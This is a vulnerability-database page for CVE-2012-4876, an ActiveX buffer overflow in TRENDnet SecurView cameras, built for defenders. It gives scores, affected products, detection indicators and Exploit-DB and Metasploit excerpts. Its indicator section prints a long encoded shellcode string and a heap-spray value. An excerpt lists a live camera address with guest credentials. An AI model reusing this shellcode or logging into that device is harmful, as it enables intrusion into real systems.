CVE-2012-4876
published 2012-09-06CVE-2012-4876: Stack-based buffer overflow in the UltraMJCam ActiveX Control in TRENDnet SecurView TV-IP121WN Wireless Internet Camera allows remote attackers to execute…
PriorityP265critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
71.18%
99.3th percentile
Stack-based buffer overflow in the UltraMJCam ActiveX Control in TRENDnet SecurView TV-IP121WN Wireless Internet Camera allows remote attackers to execute arbitrary code via a long string to the OpenFileDlg method.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trendnet | securview_wireless_internet_camera | — | — |
| trendnet | securview_wireless_internet_camera_activex_control | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570
bytes↗
%u0c0c%u0c0c
- →Detect ActiveX instantiation of the UltraMJCam control by its CLSID {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11} in HTML/script content, which is the trigger object for the exploit. ↗
- →Monitor for heap-spray pattern using 0x0c0c0c0c as the nop-sled/pivot address; EDX=0x0c0c0c0c at time of exploitation is a strong indicator. ↗
- →Presence of UltraMJCamX.ocx loaded in a browser process (iexplore.exe) combined with a call to WideCharToMultiByte with MultiByteCount=0x7532 (30002) is indicative of exploitation. ↗
- →The Metasploit module uses SEH-based exploitation with InitialAutoRunScript 'migrate -f'; detect post-exploitation process migration from iexplore.exe shortly after ActiveX load. ↗
- →Detect the OpenFileDlg method call with an excessively long sFilter argument (offset 0x600 / 1536+ chars) on the UltraMJCam ActiveX control. ↗
- →Flag HTTP responses serving HTML that instantiates CLSID 707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11 alongside large JavaScript unescape() heap-spray blocks. ↗
- ·The exploit targets only specific IE/Windows combinations; the Metasploit module returns 404 for unsupported user-agents, so detection based solely on HTTP 404 responses from the exploit server is unreliable. ↗
- ·The module notes UltraMJCamX.ocx as the only application-specific component but flags it as unreliable for use as a ROP/return gadget source, so ROP-chain-based detections tied to that module may miss variants. ↗
- ·Null byte (0x00) is a bad character for the payload; payloads containing null bytes will not function, so signature-based detection must account for null-free shellcode encodings. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TRENDnet SecurView Internet Camera - UltraMJCam OpenFileDlg Buffer Overflow (Metasploit)
exploitdb·2012-04-06
CVE-2012-4876 TRENDnet SecurView Internet Camera - UltraMJCam OpenFileDlg Buffer Overflow (Metasploit)
TRENDnet SecurView Internet Camera - UltraMJCam OpenFileDlg Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in TRENDnet SecurView Internet
Camera's ActiveX control. By supplying a long string of data as the sFilter
argument of the OpenFileDlg() function, it is possible to trigger a buffer
overflow condition due to WideCharToMultiByte (which converts unicode back to)
overwrit
Exploit-DB
TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
exploitdb·2012-03-28
CVE-2012-4876 TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
---
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest
Background:
The mentioned product, when browsing the device web interface,
asks to install an ActiveX control to stream video content.
It has the following settings:
File version: 1, 1, 52, 18
Product name: UltraMJCam device ActiveX Control
Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
ProgID: UltraMJCam.UltraMJCam.1
CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
Implements IObjectSafety:
Metasploit
TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow
metasploit
TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow
TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow
This module exploits a vulnerability found in TRENDnet SecurView Internet Camera's ActiveX control. By supplying a long string of data as the sFilter argument of the OpenFileDlg() function, it is possible to trigger a buffer overflow condition due to WideCharToMultiByte (which converts unicode back to) overwriting the stack more than it should, which results arbitrary code execution under the context of the user.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2012-03/0152.htmlhttp://osvdb.org/80661http://retrogod.altervista.org/9sg_trendnet_adv.htmhttp://secunia.com/advisories/48601http://www.exploit-db.com/exploits/18675http://www.securityfocus.com/bid/52760http://archives.neohapsis.com/archives/bugtraq/2012-03/0152.htmlhttp://osvdb.org/80661http://retrogod.altervista.org/9sg_trendnet_adv.htmhttp://secunia.com/advisories/48601http://www.exploit-db.com/exploits/18675http://www.securityfocus.com/bid/52760
2012-09-06
Published